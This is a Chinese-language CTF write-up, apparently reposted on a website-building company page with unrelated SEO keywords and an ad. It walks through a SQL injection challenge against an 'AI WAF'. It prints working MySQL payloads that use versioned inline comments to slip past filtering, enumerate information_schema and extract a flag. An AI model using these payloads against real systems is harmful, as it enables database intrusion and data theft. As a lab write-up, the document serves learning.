备案个人网站 淘宝客app设计案例
2026/4/2 9:11:14 网站建设 项目流程
备案个人网站 淘宝客,app设计案例,android开发工具箱专业版,html网站开场动画效果模板根据提示#xff0c;题目明确提到 NexaData公司存储 #xff0c;这通常和数据库相关。并且提示 AI_WAF #xff0c; “AI WAF”通常指的是具备一定语义分析能力或强正则匹配规则的防火墙#xff0c;它不仅仅匹配简单的关键 词#xff0c;而是会识别 SQL 语句…根据提示题目明确提到 NexaData公司存储这通常和数据库相关。并且提示AI_WAF“AI WAF”通常指的是具备一定语义分析能力或强正则匹配规则的防火墙它不仅仅匹配简单的关键词而是会识别 SQL 语句的结构。根据上面的分析极大概率是一个SQL注入绕过WAF的题目。按照正常的SQL注入流程来即可只不过绕过的规则可能不同。先在kali中使用dirsearch扫描一下网址扫除一个alert和search但是只有alert能够访问访问alert页面发现是一个SQL检测识别的页面这个应该就是题目中的AI_WAF用来判断网页是否遭受SQL注入攻击以及显示用户的操作行为是SQL注入攻击的概率。和正常的SQL注入流程一样先找到注入点在网页找到一个搜索框。搜索输入1可以搜索到结果在搜索框输入注入语句显示无法搜索到结果应该是备WAF过滤掉了。查看源代码没发现直接的参数直接BP抓包查看格式。通过POST方法向/search接口发送JSON格式数据 的HTTP请求在这里尝试了很多绕过方式但是大多都被WAF识别拦截了。但是在使用内联注释/!50400/时回显成功内联注释是一个非常经典的利用 MySQL 特性来绕过 WAF规则的技巧。在标准SQL中/…/里的内容会被当作注释忽略但在MySQL中/!50400/这代表“如果当前数据库版本高于或等于5.04.00则执行其中的代码”。接下来就是正常的SQL注入流程了1确认注入点与列数使用搜索时1有回显可以用来作为注入点使用order by命令判断列数为3。1 /*!50400order*/ /*!50400by*/3#2判断回显位置爆数据库名将参数设置为-1让前面的查询为空强行显示后面Union的结果。可以看到3个回显位置content、id、title得到数据库为nexadata和前面提示的公司的名字一样-1 /*!50400union*/ /*!50400select*/1,/*!50400database*/(),3#3根据数据库名爆表名注意这里不能使用group_concat(table_name)而是用limit被过滤掉了当时在卡在这里试了好久。得到两个表明article、where_is_my_flagggggg-1 /*!50400union*/ /*!50400select*/ 1,2,table_name /*!50400from*/ /*!50400information_schema*/.tables /*!50400where*/ table_schemadatabase() /*!50400limit*/0,1 # ​ -1/*!50400union*/ /*!50400select*/1,2,table_name /*!50400from*/ /*!50400information_schema*/.tables /*!50400where*/table_schemadatabase()/*!50400limit*/1,1#4根据数据库名和表名爆列名显然where_is_my_flagggggg表中有我们要的flag这里表名我使用了十六进制单引号会被识别到。得到一个列名Th15_ls_f149-1 /*!50400union*/ /*!50400select*/1,2,column_name /*!50400from*/ /*!50400information_schema*/.columns /*!50400where*/table_name0x77686572655f69735f6d795f666c61676767676767 /*!50400limit*/0,1#这个地方当时忘记截图了5根据表名和列名爆字段、最终得到flag-1 /*!50400union*/ /*!50400select*/1,2,Th15_ls_f149/*!50400from*/ where_is_my_flagggggg /*!50400limit*/0,1#

需要专业的网站建设服务?

联系我们获取免费的网站建设咨询和方案报价,让我们帮助您实现业务目标

立即咨询